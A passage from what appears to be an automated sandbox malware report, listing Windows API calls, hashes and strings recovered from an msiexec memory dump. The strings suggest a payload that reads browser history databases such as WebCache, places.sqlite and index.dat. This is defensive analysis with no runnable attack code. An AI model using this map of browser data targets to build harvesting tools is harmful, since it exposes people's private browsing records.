                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                            • API String ID: 1714573020-3385500049
                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004087D6
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                            • memset.MSVCRT ref: 00408828
                                                                            • memset.MSVCRT ref: 00408840
                                                                            • memset.MSVCRT ref: 00408858
                                                                            • memset.MSVCRT ref: 00408870
                                                                            • memset.MSVCRT ref: 00408888
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2911713577-0
                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp
                                                                            • String ID: @ $SQLite format 3
                                                                            • API String ID: 1475443563-3708268960
                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpqsort
                                                                            • String ID: /nosort$/sort
                                                                            • API String ID: 1579243037-1578091866
                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E60F
                                                                            • memset.MSVCRT ref: 0040E629
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                            • API String ID: 3354267031-2114579845
                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                            APIs
                                                                            Strings
                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                            • API String ID: 2221118986-1725073988
                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                            APIs
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$memcmp
                                                                            • String ID: $$8
                                                                            • API String ID: 2808797137-435121686
                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                            APIs
                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                            • String ID:
                                                                            • API String ID: 1979745280-0
                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                            APIs
                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                            • free.MSVCRT ref: 00418803
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                            • String ID:
                                                                            • API String ID: 1355100292-0
                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                            APIs
                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            • memset.MSVCRT ref: 00414C87
                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProcVersionmemsetwcscpy
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 4182280571-2036018995
                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                            APIs
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                            • memset.MSVCRT ref: 00403A55
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                            • String ID: history.dat$places.sqlite
                                                                            • API String ID: 2641622041-467022611
                                                                            • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                            • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                            APIs
                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$File$PointerRead
                                                                            • String ID:
                                                                            • API String ID: 839530781-0
                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID: *.*$index.dat
                                                                            • API String ID: 1974802433-2863569691
                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                            • String ID:
                                                                            • API String ID: 1125800050-0
                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep
                                                                            • String ID: }A
                                                                            • API String ID: 252777609-2138825249
                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                            APIs
                                                                            • malloc.MSVCRT ref: 00409A10
                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                            • free.MSVCRT ref: 00409A31
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: freemallocmemcpy
                                                                            • String ID:
                                                                            • API String ID: 3056473165-0
                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d
                                                                            • API String ID: 0-2564639436
                                                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: BINARY
                                                                            • API String ID: 2221118986-907554435
                                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /stext
                                                                            • API String ID: 2081463915-3817206916
                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
